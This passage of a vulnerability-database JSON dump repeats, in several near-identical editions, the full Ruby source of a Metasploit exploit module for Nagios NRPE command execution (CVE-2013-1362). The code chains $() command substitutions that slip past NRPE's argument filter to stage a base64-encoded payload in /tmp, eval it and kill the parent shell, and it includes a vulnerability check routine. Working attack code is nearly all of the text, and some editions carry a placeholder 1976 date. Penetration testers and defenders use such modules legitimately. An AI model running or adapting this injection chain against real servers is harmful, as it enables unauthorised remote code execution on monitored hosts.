Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-19T19:54:05", "differentElements": ["modified", "published"], "edition": 52}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-19T21:56:07", "history": [], "viewCount": 82, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-19T21:56:07", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-19T21:56:07", "differentElements": ["modified", "published"], "edition": 53}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-22T21:45:17", "history": [], "viewCount": 82, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-22T21:45:17", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-22T21:45:17", "differentElements": ["modified", "published"], "edition": 54}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "2013-03-19T08:43:46", "modified": "2017-07-24T13:26:21", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-23T07:53:05", "history": [], "viewCount": 82, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-23T07:53:05", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
end\n\n def exploit\n\n if check != Exploit::CheckCode::Vulnerable\n fail_with(Failure::NotFound, \"Host does not support plugin command line arguments or is not accepting connections\")\n end\n\n stage = \"setsid nohup #{payload.encoded} & \"\n stage = Rex::Text.encode_base64(stage)\n # NRPE will reject queries containing |`&><'\\\"\\\\[]{}; but not $() :)\n command = datastore['NRPECMD']\n command << \"!\"\n command << \"$($(rm -f /tmp/$$)\" \t# Delete the file if it exists\n # need a way to write to a file without using redirection (>)\n # cant count on perl being on all linux hosts, use GNU Sed\n # TODO: Probably a better way to do this, some hosts may not have a /tmp\n command << \"$(cp -f /etc/passwd /tmp/$$)\" # populate the file with at least one line of text\n command << \"$(sed 1i#{stage} -i /tmp/$$)\" # prepend our stage to the file\n command << \"$(sed q -i /tmp/$$)\" # delete the rest of the lines after our stage\n command << \"$(eval $(base64 -d /tmp/$$) )\" # decode and execute our stage, base64 is in coreutils right?\n command << \"$(kill -9 $$)\" # kill check_procs parent (popen'd sh) so that it never executes\n command << \"$(rm -f /tmp/$$))\" # clean the file with the stage\n connect\n print_status(\"Sending request...\")\n send_message(command)\n disconnect\n end\n\n def check\n vprint_status(\"Checking if remote NRPE supports command line arguments\")\n\n begin\n # send query asking to run \"fake_check\" command with command substitution in arguments\n connect\n res = send_message(\"__fake_check!$()\")\n # if nrpe is configured to support arguments and is not patched to add $() to\n # NASTY_META_CHARS then the service will return:\n # NRPE: Command '__fake_check' not defined\n if res =~ /not defined/\n return Exploit::CheckCode::Vulnerable\n end\n # Otherwise the service will close the connection if it is configured to disable arguments\n rescue EOFError => eof\n return Exploit::CheckCode::Safe\n rescue Errno::ECONNRESET => reset\n unless 
datastore['NRPESSL'] or @force_ssl\n vprint_status(\"Retrying with ADH SSL\")\n @force_ssl = true\n retry\n end\n return Exploit::CheckCode::Safe\n rescue => e\n return Exploit::CheckCode::Unknown\n end\n # TODO: patched version appears to go here\n return Exploit::CheckCode::Unknown\n\n end\n\n # NRPE uses unauthenticated Anonymous-Diffie-Hellman\n\n # setting the global SSL => true will break as we would be overlaying\n # an SSLSocket on another SSLSocket which hasnt completed its handshake\n def connect(global = true, opts={})\n\n self.sock = super(global, opts)\n\n if datastore['NRPESSL'] or @force_ssl\n ctx = OpenSSL::SSL::SSLContext.new(:TLSv1)\n ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE\n ctx.ciphers = \"ADH\"\n\n @ssl_socket = OpenSSL::SSL::SSLSocket.new(self.sock, ctx)\n\n @ssl_socket.connect\n\n self.sock.extend(Rex::Socket::SslTcp)\n self.sock.sslsock = @ssl_socket\n self.sock.sslctx = ctx\n end\n\n return self.sock\n end\n\n def disconnect\n @ssl_socket.sysclose if datastore['NRPESSL'] or @force_ssl\n super\n end\nend\n", "metasploitReliability": "Excellent", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb"}, "lastseen": "2018-03-23T07:53:05", "differentElements": ["modified", "published"], "edition": 55}, {"bulletin": {"id": "MSF:EXPLOIT/LINUX/MISC/NAGIOS_NRPE_ARGUMENTS", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Nagios Remote Plugin Executor Arbitrary Command Execution", "description": "The Nagios Remote Plugin Executor (NRPE) is installed to allow a central Nagios server to actively poll information from the hosts it monitors. NRPE has a configuration option dont_blame_nrpe which enables command-line arguments to be provided remote plugins. 
When this option is enabled, even when NRPE makes an effort to sanitize arguments to prevent command execution, it is possible to execute arbitrary commands.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2013-1362"], "lastseen": "2018-03-23T11:50:59", "history": [], "viewCount": 82, "enchantments": {"score": {"value": 3.3, "modified": "2018-03-23T11:50:59", "vector": "AV:N/AC:L/Au:M/C:N/I:N/A:P/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/misc/nagios_nrpe_arguments.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n#\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::Tcp\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Nagios Remote Plugin Executor Arbitrary Command Execution',\n 'Description' => %q{\n The Nagios Remote Plugin Executor (NRPE) is installed to allow a central\n Nagios server to actively poll information from the hosts it monitors. NRPE\n has a configuration option dont_blame_nrpe which enables command-line arguments\n to be provided remote plugins. 
When this option is enabled, even when NRPE makes\n an effort to sanitize arguments to prevent command execution, it is possible to\n execute arbitrary commands.\n },\n 'Author' =>\n [\n 'Rudolph Pereir', # Vulnerability discovery\n 'jwpari <jwpari[at]beersec.org>' # Independently discovered and Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2013-1362' ],\n [ 'OSVDB', '90582'],\n [ 'BID', '58142'],\n [ 'URL', 'http://www.occamsec.com/vulnerabilities.html#nagios_metacharacter_vulnerability']\n ],\n 'License' => MSF_LICENSE,\n 'Platform' => 'unix',\n 'Arch' => ARCH_CMD,\n 'Payload' =>\n {\n 'DisableNops' => true,\n 'Compat' =>\n {\n 'PayloadType' => 'cmd',\n 'RequiredCmd' => 'perl python ruby telnet',\n # *_perl, *_python and *_ruby work if they are installed\n }\n },\n 'Targets' =>\n [\n [ 'Nagios Remote Plugin Executor prior to 2.14', {} ]\n ],\n 'DefaultTarget' => 0,\n 'DisclosureDate' => 'Feb 21 2013'\n ))\n\n register_options(\n [\n Opt::RPORT(5666),\n OptEnum.new('NRPECMD', [\n true,\n \"NRPE Command to exploit, command must be configured to accept arguments in nrpe.cfg\",\n 'check_procs',\n ['check_procs', 'check_users', 'check_load', 'check_disk']\n ]),\n # Rex::Socket::Tcp will not work with ADH, see comment with replacement connect below\n OptBool.new('NRPESSL', [ true, \"Use NRPE's Anonymous-Diffie-Hellman-variant SSL \", true])\n ])\n end\n\n def send_message(message)\n packet = [\n 2, # packet version\n 1, # packet type, 1 => query packet\n 0, # checksum, to be added later\n 0, # result code, discarded for query packet\n message, # the command and arguments\n 0 # padding\n ]\n packet[2] = Zlib::crc32(packet.pack(\"nnNna1024n\")) # calculate the checksum\n begin\n self.sock.put(packet.pack(\"nnNna1024n\")) #send the packet\n res = self.sock.get_once # get the response\n rescue ::EOFError => eof\n res = \"\"\n end\n\n return res.unpack(\"nnNnA1024n\")[4] unless res.nil?\n end\n\n def setup\n @ssl_socket = nil\n @force_ssl = false\n super\n 
